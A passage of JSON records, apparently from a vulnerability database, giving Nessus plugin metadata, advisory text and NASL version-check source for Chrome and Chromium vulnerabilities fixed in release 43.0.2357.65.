value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'43.0.2357.65', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T14:15:22", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 43.0.2357.65. It is, therefore, affected by multiple vulnerabilities :\n\n - A Use-after-free memory error exists in the SpeechRecognitionClient implementation that allows remote attackers, using a crafted document, to execute arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class PartialCircularBuffer do not properly handle wraps.\n A remote attacker, by using write operations with a large amount of data, can exploit this to bypass the sandbox protection or cause a denial of service.\n (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly handle SCRIPT elements during adjustment of DOM node locations. A remote attacker, using crafted JavaScript code that appends a child to a SCRIPT element, can exploit this flaw to bypass the same origin policy.\n (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the inheritance of the 'designMode' attribute. A remote attacker, using a crafted web page, can utilize this to bypass the same origin policy via the availability of editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio implementation when handling the stop action for an audio track. A remote attacker can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG implementation in Blink, related to the improper handling of a shadow tree for a use element. A remote attacker, using a crafted document, can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle an insufficient number of values in an feColorMatrix filter. A remote attacker, using a crafted document, can exploit this to cause a denial of service via a container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an appropriate '--size-limit' value. This allows a remote attacker, using a crafted frame size in VP9 video data, to trigger a negative value for a size field, thus causing a denial of service or possibly having other impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact.\n (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC implementation. A remote attacker can exploit these, by using a crafted JavaScript code that executes upon completion of a getUserMedia request, to cause a denial of service or possibly have other unspecified impact.\n (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly initialize a certain width field. A remote attacker, using crafted Unicode text, can exploit this to cause a denial of service or have other unspecified impact.\n (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS session for downloading a Hunspell dictionary. A man-in-the-middle attacker, using a crafted file, can exploit this flaw to deliver incorrect spelling suggestions or possibly have other unspecified impact.\n (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that is related to the Bookmarks feature. A remote attacker, using crafted data, can exploit this to inject arbitrary web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1265)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-21T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.65 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_43_0_2357_65.NASL", "href": "https://www.tenable.com/plugins/nessus/83746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83746);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-1251\",\n \"CVE-2015-1252\",\n \"CVE-2015-1253\",\n \"CVE-2015-1254\",\n \"CVE-2015-1255\",\n \"CVE-2015-1256\",\n \"CVE-2015-1257\",\n \"CVE-2015-1258\",\n \"CVE-2015-1259\",\n \"CVE-2015-1260\",\n \"CVE-2015-1262\",\n \"CVE-2015-1263\",\n \"CVE-2015-1264\",\n \"CVE-2015-1265\"\n );\n script_bugtraq_id(74723, 74727);\n\n script_name(english:\"Google Chrome < 43.0.2357.65 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 43.0.2357.65. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A Use-after-free memory error exists in the\n SpeechRecognitionClient implementation that allows\n remote attackers, using a crafted document, to execute\n arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class\n PartialCircularBuffer do not properly handle wraps.\n A remote attacker, by using write operations with a\n large amount of data, can exploit this to bypass the\n sandbox protection or cause a denial of service.\n (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly\n handle SCRIPT elements during adjustment of DOM node\n locations. A remote attacker, using crafted JavaScript\n code that appends a child to a SCRIPT element, can\n exploit this flaw to bypass the same origin policy.\n (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the\n inheritance of the 'designMode' attribute. A remote\n attacker, using a crafted web page, can utilize this to\n bypass the same origin policy via the availability of\n editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio\n implementation when handling the stop action for an\n audio track. A remote attacker can exploit this to\n cause a denial of service or possibly execute\n arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG\n implementation in Blink, related to the improper\n handling of a shadow tree for a use element. A remote\n attacker, using a crafted document, can exploit this\n to cause a denial of service or possibly execute\n arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle\n an insufficient number of values in an feColorMatrix\n filter. A remote attacker, using a crafted document, can\n exploit this to cause a denial of service via a\n container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an\n appropriate '--size-limit' value. This allows a remote\n attacker, using a crafted frame size in VP9 video data,\n to trigger a negative value for a size field, thus\n causing a denial of service or possibly having other\n impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A\n remote attacker can exploit this to cause a denial of\n service or possibly have other unspecified impact.\n (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC\n implementation. A remote attacker can exploit these, by\n using a crafted JavaScript code that executes upon\n completion of a getUserMedia request, to cause a denial\n of service or possibly have other unspecified impact.\n (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly\n initialize a certain width field. A remote attacker,\n using crafted Unicode text, can exploit this to cause a\n denial of service or have other unspecified impact.\n (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS\n session for downloading a Hunspell dictionary. A\n man-in-the-middle attacker, using a crafted file, can\n exploit this flaw to deliver incorrect spelling\n suggestions or possibly have other unspecified impact.\n (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that\n is related to the Bookmarks feature. A remote attacker,\n using crafted data, can exploit this to inject arbitrary\n web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an\n attacker to cause a denial of service or possibly have\n other impact via unknown vectors. (CVE-2015-1265)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update_19.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9eefd81\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.65 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1265\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'43.0.2357.65', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:16", "description": "The version of Google Chrome on the remote host is prior to 43.0.2357.65 and is affected by the following vulnerabilities :\n\n - A use-after-free memory error exists in the SpeechRecognitionClient implementation that allows remote attackers, using a crafted document, to execute arbitrary code. (CVE-2015-1251)\n\n - The Write() and DoWrite() methods of the class PartialCircularBuffer do not properly handle wraps. A remote attacker, by using write operations with a large amount of data, can exploit this to bypass the sandbox protection or cause a denial of service. (CVE-2015-1252)\n\n - The DOM implementation in Blink does not properly handle SCRIPT elements during adjustment of DOM node locations. A remote attacker, using crafted JavaScript code that appends a child to a SCRIPT element, can exploit this flaw to bypass the same origin policy. (CVE-2015-1253)\n\n - The 'core/dom/Document.cpp' in Blink enables the inheritance of the 'designMode' attribute. A remote attacker, using a crafted web page, can utilize this to bypass the same origin policy via the availability of editing. (CVE-2015-1254)\n\n - A use-after-free memory error exists in the WebAudio implementation when handling the stop action for an audio track. A remote attacker can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1255)\n\n - A use-after-free memory error exists in the SVG implementation in Blink, related to the improper handling of a shadow tree for a use element. A remote attacker, using a crafted document, can exploit this to cause a denial of service or possibly execute arbitrary code. (CVE-2015-1256)\n\n - The SVG implementation in Blink does not properly handle an insufficient number of values in an 'feColorMatrix' filter. A remote attacker, using a crafted document, can exploit this to cause a denial of service via a container overflow. (CVE-2015-1257)\n\n - The libvpx library code was not compiled with an appropriate '--size-limit' value. This allows a remote attacker, using a crafted frame size in VP9 video data, to trigger a negative value for a size field, thus causing a denial of service or possibly having other impact. (CVE-2015-1258)\n\n - Google PDFium does not properly initialize memory. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact. (CVE-2015-1259)\n\n - Multiple use-after-free memory errors exist the WebRTC implementation. A remote attacker can exploit these, by using a crafted JavaScript code that executes upon completion of a 'getUserMedia' request, to cause a denial of service or possibly have other unspecified impacts. (CVE-2015-1260)\n\n - The file 'HarfBuzzShaper.cpp' in Blink does not properly initialize a certain width field. A remote attacker, using crafted Unicode text, can exploit this to cause a denial of service or have other unspecified impacts. (CVE-2015-1262)\n\n - The Spellcheck API implementation does not use an HTTPS session for downloading a Hunspell dictionary. A man-in-the-middle attacker, using a crafted file, can exploit this flaw to deliver incorrect spelling suggestions or possibly have other unspecified impacts. (CVE-2015-1263)\n\n - A cross-site scripting (XSS) vulnerability exists that is related to the Bookmarks feature. A remote attacker, using crafted data, can exploit this to inject arbitrary web script or HTML. (CVE-2015-1264)\n\n - Multiple unspecified vulnerabilities exist that allow an attacker to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1265)", "cvss3": {"score": null, "vector": null}, "published": "2015-06-16T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.65 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "8782.PASL", "href": "https://www.tenable.com/plugins/nnm/8782", "sourceData": "Binary data 8782.pasl", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:45:50", "description": "Google Chrome Releases reports :\n\n37 security fixes in this release, including :\n\n- [474029] High CVE-2015-1252: Sandbox escape in Chrome. Credit to anonymous.\n\n- [464552] High CVE-2015-1253: Cross-origin bypass in DOM. Credit to anonymous.\n\n- [444927] High CVE-2015-1254: Cross-origin bypass in Editing. Credit to armin@rawsec.net.\n\n- [473253] High CVE-2015-1255: Use-after-free in WebAudio. Credit to Khalil Zhani.\n\n- [478549] High CVE-2015-1256: Use-after-free in SVG. Credit to Atte Kettunen of OUSPG.\n\n- [481015] High CVE-2015-1251: Use-after-free in Speech. Credit to SkyLined working with HP's Zero Day Initiative.\n\n- [468519] Medium CVE-2015-1257: Container-overflow in SVG. Credit to miaubiz.\n\n- [450939] Medium CVE-2015-1258: Negative-size parameter in libvpx.\nCredit to cloudfuzzer\n\n- [468167] Medium CVE-2015-1259: Uninitialized value in PDFium. Credit to Atte Kettunen of OUSPG\n\n- [474370] Medium CVE-2015-1260: Use-after-free in WebRTC. Credit to Khalil Zhani.\n\n- [466351] Medium CVE-2015-1261: URL bar spoofing. Credit to Juho Nurminen.\n\n- [476647] Medium CVE-2015-1262: Uninitialized value in Blink. Credit to miaubiz.\n\n- [479162] Low CVE-2015-1263: Insecure download of spellcheck dictionary. Credit to Mike Ruddy.\n\n- [481015] Low CVE-2015-1264: Cross-site scripting in bookmarks.\nCredit to K0r3Ph1L.\n\n- [489518] CVE-2015-1265: Various fixes from internal audits, fuzzing and other initiatives.\n\n- Multiple vulnerabilities in V8 fixed at the tip of the 4.3 branch (currently 4.3.61.21).", "cvss3": {"score": null, "vector": null}, "published": "2015-05-20T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (a9d456b4-fe4c-11e4-ad15-00262d5ed8ee)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A9D456B4FE4C11E4AD1500262D5ED8EE.NASL", "href": "https://www.tenable.com/plugins/nessus/83556", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83556);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (a9d456b4-fe4c-11e4-ad15-00262d5ed8ee)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n37 security fixes in this release, including :\n\n- [474029] High CVE-2015-1252: Sandbox escape in Chrome. Credit to\nanonymous.\n\n- [464552] High CVE-2015-1253: Cross-origin bypass in DOM. Credit to\nanonymous.\n\n- [444927] High CVE-2015-1254: Cross-origin bypass in Editing. Credit\nto armin@rawsec.net.\n\n- [473253] High CVE-2015-1255: Use-after-free in WebAudio. Credit to\nKhalil Zhani.\n\n- [478549] High CVE-2015-1256: Use-after-free in SVG. Credit to Atte\nKettunen of OUSPG.\n\n- [481015] High CVE-2015-1251: Use-after-free in Speech. Credit to\nSkyLined working with HP's Zero Day Initiative.\n\n- [468519] Medium CVE-2015-1257: Container-overflow in SVG. Credit to\nmiaubiz.\n\n- [450939] Medium CVE-2015-1258: Negative-size parameter in libvpx.\nCredit to cloudfuzzer\n\n- [468167] Medium CVE-2015-1259: Uninitialized value in PDFium. Credit\nto Atte Kettunen of OUSPG\n\n- [474370] Medium CVE-2015-1260: Use-after-free in WebRTC. Credit to\nKhalil Zhani.\n\n- [466351] Medium CVE-2015-1261: URL bar spoofing. Credit to Juho\nNurminen.\n\n- [476647] Medium CVE-2015-1262: Uninitialized value in Blink. Credit\nto miaubiz.\n\n- [479162] Low CVE-2015-1263: Insecure download of spellcheck\ndictionary. Credit to Mike Ruddy.\n\n- [481015] Low CVE-2015-1264: Cross-site scripting in bookmarks.\nCredit to K0r3Ph1L.\n\n- [489518] CVE-2015-1265: Various fixes from internal audits, fuzzing\nand other initiatives.\n\n- Multiple vulnerabilities in V8 fixed at the tip of the 4.3 branch\n(currently 4.3.61.21).\"\n );\n # http://googlechromereleases.blogspot.nl/2015/05/stable-channel-update_19.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?73e36afd\"\n );\n # https://vuxml.freebsd.org/freebsd/a9d456b4-fe4c-11e4-ad15-00262d5ed8ee.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7182e7bf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<43.0.2357.65\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<43.0.2357.65\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<43.0.2357.65\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:59", "description": "Updated chromium-browser packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash or, potentially, execute arbitrary code with the privileges of the user running Chromium. (CVE-2015-1251, CVE-2015-1252, CVE-2015-1253, CVE-2015-1254, CVE-2015-1255, CVE-2015-1256, CVE-2015-1257, CVE-2015-1258, CVE-2015-1259, CVE-2015-1260, CVE-2015-1261, CVE-2015-1262, CVE-2015-1263, CVE-2015-1264, CVE-2015-1265)\n\nAll Chromium users should upgrade to these updated packages, which contain Chromium version 43.0.2357.65, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the changes to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2015-05-26T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2015:1023)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1261", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2015-1023.NASL", "href": "https://www.tenable.com/plugins/nessus/83808", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1023. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83808);\n script_version(\"2.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1261\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_bugtraq_id(74723, 74727);\n script_xref(name:\"RHSA\", value:\"2015:1023\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2015:1023)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2015-1251, CVE-2015-1252, CVE-2015-1253,\nCVE-2015-1254, CVE-2015-1255, CVE-2015-1256, CVE-2015-1257,\nCVE-2015-1258, CVE-2015-1259, CVE-2015-1260, CVE-2015-1261,\nCVE-2015-1262, CVE-2015-1263, CVE-2015-1264, CVE-2015-1265)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 43.0.2357.65, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.\"\n );\n # https://googlechromereleases.blogspot.com/2015/05/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2015/05/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1262\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1264\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1265\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1257\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1259\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1258\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n 